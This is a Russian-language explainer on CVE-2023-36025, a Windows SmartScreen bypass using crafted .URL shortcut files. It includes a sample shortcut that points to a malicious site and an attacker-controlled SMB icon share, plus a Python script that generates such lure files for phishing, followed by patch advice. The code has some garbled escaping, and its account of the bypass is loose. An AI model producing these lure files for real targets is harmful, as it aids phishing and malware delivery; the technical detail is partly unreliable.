В мире кибербезопасности появление такой уязвимости, как CVE-2023-36025 в Windows SmartScreen, является значительным событием. В статье рассмотрим эту уязвимость, способы ее эксплуатации и последствия.
Еще по теме: Лучшие сайты для поиска уязвимостей
Уязвимость CVE-2023-36025
CVE-2023-36025 классифицируется как уязвимость обхода средств защиты в функции Windows SmartScreen. SmartScreen служит защитой от недоверенных источников, предупреждая пользователя о потенциально вредоносных сайтах и файлах. Данная уязвимость позволяет злоумышленнику создавать специальные файлы или гиперссылки, позволяющие обойти предупреждения SmartScreen.
Эксплуатация уязвимости CVE-2023-36025
Суть уязвимости заключается в создании поддельного файла Internet Shortcut ( .URL) или гиперссылки, указывающей на такой файл, который SmartScreen не сможет пометить как потенциально опасный.
Файл с расширением .URL представляет собой ярлык или ссылку на веб-страницу. Внутри этого файла хранится адрес (URL) ресурса в интернете. Когда вы открываете такой файл, он запускает веб-браузер и автоматически переходит на указанный в нем веб-сайт.
Рассмотрим пример файла, который может быть использован для эксплуатации CVE-2023-36025.
1 2 3 4 5 |
[InternetShortcut] URL=vredonosnij-site.com IDList= IconFile=\\\\\\\\192.168.1.100\\\\share\\\\icon.ico IconIndex=1 |
Данный файл .URL указывает на вредоносный сайт, но может быть представлен как нечто легитимное. Путь к IconFile может представлять собой сетевое местоположение, контролируемое злоумышленником и потенциально содержащее вредоносную полезную нагрузку.
Механизм доставки
Злоумышленник может передать созданный файл через фишинговую рассылку или скомпрометированный сайт. Если пользователь нажмет на этом файле, то из-за уязвимости CVE-2023-36025 SmartScreen не сможет выдать обычное предупреждение о безопасности, что приведет пользователя непосредственно на вредоносный сайт или к выполнению вредоносного кода.
Скрипт для атаки
Ниже приведен простой скрипт на Python для имитации создания поддельного файла .URL.
1 2 3 4 5 6 7 8 9 10 11 |
def create_malicious_url_file(filename, target_url, icon_path): with open(filename, 'w') as file: file.write('[InternetShortcut]\\\\n') file.write(f'URL={target_url}\\\\n') file.write('IDList=\\\\n') file.write(f'IconFile={icon_path}\\\\n') file.write('IconIndex=1\\\\n') malicious_url = "<http://malicious-website.com>" icon_network_path = "\\\\\\\\\\\\\\\\192.168.1.100\\\\\\\\share\\\\\\\\icon.ico" create_malicious_url_file("malicious_link.url", malicious_url, icon_network_path) |
Этот сценарий генерирует файл .URL, который может быть использован в фишинговой кампании. Опять же, это гипотетический сценарий для понимания природы уязвимости.
Последствия и устранение уязвимость CVE-2023-36025
Эксплуатация CVE-2023-36025 может привести к успешным фишинговым атакам, распространению вредоносного ПО и другим угрозам кибербезопасности. Пользователям следует с осторожностью открывать файлы и ссылки из ненадежных источников.
Компания Microsoft выпустила исправление для этой уязвимости, и пользователям настоятельно рекомендуется обновить свои системы для снижения риска.
Понимание и устранение уязвимостей, подобных CVE-2023-36025, имеет решающее значение в постоянной борьбе с киберугрозами. Регулярные обновления позволяют существенно снизить риски, связанные с ними.
ПОЛЕЗНЫЕ ССЫЛКИ: